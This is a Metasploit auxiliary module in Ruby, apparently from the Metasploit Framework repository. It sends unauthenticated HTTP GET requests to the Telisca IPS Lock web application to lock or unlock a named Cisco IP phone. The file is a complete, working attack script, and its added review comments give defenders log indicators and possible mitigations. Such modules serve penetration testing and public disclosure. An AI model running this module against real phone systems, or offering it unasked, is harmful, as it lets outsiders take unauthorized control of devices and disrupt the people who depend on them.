rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/telisca_ips_lock_control.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
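# Auxiliary module that sends the "Lock" and "Unlock" requests of the Telisca
# IPS Lock web application for a named Cisco IP phone.
#
# Review notes for defenders, based on what this file shows:
# - Both actions are plain GET requests to /IPSPCFG/user/Default.aspx, and the
#   module supplies no credentials, session cookie or token with them.
# - The requests can be told apart in web server access logs by their query
#   string: action=DO with tg=L for a lock, action=U7LCK for an unlock, and
#   pn=<phone name> in both. That is consistent with the IOC_IN_LOGS side
#   effect declared in the module notes.
# - NOTE(review): the file names no fixed product version. Limiting which
#   hosts can reach the IPS Lock web interface and requiring authentication
#   for these actions look like the relevant mitigations - confirm with the
#   vendor.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata, the LOCK/UNLOCK actions and the two
  # required options (RHOST and PHONENAME).
  #
  # @param info [Hash] Metadata passed in by the framework and merged with the
  #   values below through update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Telisca IPS Lock Cisco IP Phone Control',
        'Description' => %q{
          This module allows an unauthenticated attacker to exercise the
          "Lock" and "Unlock" functionality of Telisca IPS Lock for Cisco IP
          Phones. This module should be run in the VoIP VLAN, and requires
          knowledge of the target phone's name (for example, SEP002497AB1D4B).

          Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.
        },
        'References' => [
          # Publicly disclosed via Metasploit PR
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'],
        ],
        'Author' => [
          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
          'zirsalem'
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2015-12-17',
        'Actions' => [
          ['LOCK', { 'Description' => 'To lock a phone' }],
          ['UNLOCK', { 'Description' => 'To unlock a phone' }]
        ],
        'DefaultAction' => 'UNLOCK',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The lock/unlock requests are ordinary HTTP GETs, so they are
          # expected to show up in the target's web server logs.
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),
        OptString.new('PHONENAME', [true, 'The name of the target phone'])
      ]
    )
  end

  # Prefixes status output with the peer so every line names the target.
  #
  # @param msg [String] Message to print.
  def print_status(msg = '')
    super("#{peer} - #{msg}")
  end

  # Prefixes success output with the peer so every line names the target.
  #
  # @param msg [String] Message to print.
  def print_good(msg = '')
    super("#{peer} - #{msg}")
  end

  # Prefixes error output with the peer so every line names the target.
  #
  # @param msg [String] Message to print.
  def print_error(msg = '')
    super("#{peer} - #{msg}")
  end

  # Returns the status of the listening port by requesting "/".
  #
  # Connection-level failures are reported through the verbose printers and
  # mapped to false instead of propagating to the caller.
  #
  # @return [Boolean] true if a response was received, otherwise false.
  def port_open?
    response = send_request_raw({ 'method' => 'GET', 'uri' => '/' })
    response ? true : false
  rescue ::Rex::ConnectionRefused
    vprint_status('Connection refused')
    false
  rescue ::Rex::ConnectionError
    vprint_error('Connection failed')
    false
  rescue ::OpenSSL::SSL::SSLError
    vprint_error('SSL/TLS connection error')
    false
  end

  # Locks a device.
  #
  # @param phone_name [String] Name of the phone used for the pn parameter.
  #
  # @return [void]
  def lock(phone_name)
    res = request_ips_lock(
      {
        'action' => 'DO',
        'tg' => 'L',
        'pn' => phone_name,
        'dp' => '',
        'gr' => '',
        'gl' => ''
      },
      'lock'
    )
    return unless res

    # Case-sensitive substring checks on the returned page; the "already
    # locked" markers are tested first, so they win when both sets match.
    body = res.body
    if body.include?('Unlock') || body.include?('U7LCK')
      print_good("The device #{phone_name} is already locked")
    elsif body.include?('unlocked') || body.include?('Locking') || body.include?('QUIT')
      print_good("Device #{phone_name} successfully locked")
    else
      print_error('Unexpected reply')
    end
  end

  # Unlocks a phone.
  #
  # @param phone_name [String] Name of the phone used for the pn parameter.
  #
  # @return [void]
  def unlock(phone_name)
    res = request_ips_lock(
      {
        'action' => 'U7LCK',
        'pn' => phone_name,
        'dp' => ''
      },
      'unlock'
    )
    return unless res

    body = res.body
    if body.include?('Unlock') || body.include?('U7LCK')
      # NOTE(review): this branch reports "already locked" through print_good
      # on the unlock path. Presumably a page that still offers "Unlock" means
      # the phone stayed locked - confirm the intended wording and severity.
      print_good("The device #{phone_name} is already locked")
    elsif body.include?('unlocked') || body.include?('QUIT')
      print_good("The device #{phone_name} successfully unlocked")
    else
      print_error('Unexpected reply')
    end
  end

  # Checks that the web server answers, then dispatches to the selected action
  # with the configured PHONENAME.
  #
  # @return [void]
  def run
    unless port_open?
      print_error('The web server is unreachable!')
      return
    end

    phone_name = datastore['PHONENAME']
    case action.name
    when 'LOCK'
      lock(phone_name)
    when 'UNLOCK'
      unlock(phone_name)
    end
  end

  private

  # Sends one GET request to the IPS Lock user page and validates the reply.
  #
  # Shared by #lock and #unlock so the timeout message names the operation
  # that was actually attempted (the lock path used to report "unlock").
  #
  # @param vars_get [Hash] Query-string parameters for the request.
  # @param operation [String] Operation name used in the timeout message.
  #
  # @return [Object, nil] The HTTP response when its code is 200, otherwise
  #   nil after the problem has been printed.
  def request_ips_lock(vars_get, operation)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/IPSPCFG/user/Default.aspx',
      'headers' => {
        'Connection' => 'keep-alive',
        'Accept-Language' => 'en-US,en;q=0.5'
      },
      'vars_get' => vars_get
    })

    unless res
      print_error("The connection timed out while trying to #{operation}")
      return nil
    end

    unless res.code == 200
      print_error("Unexpected response #{res.code}")
      return nil
    end

    res
  end
end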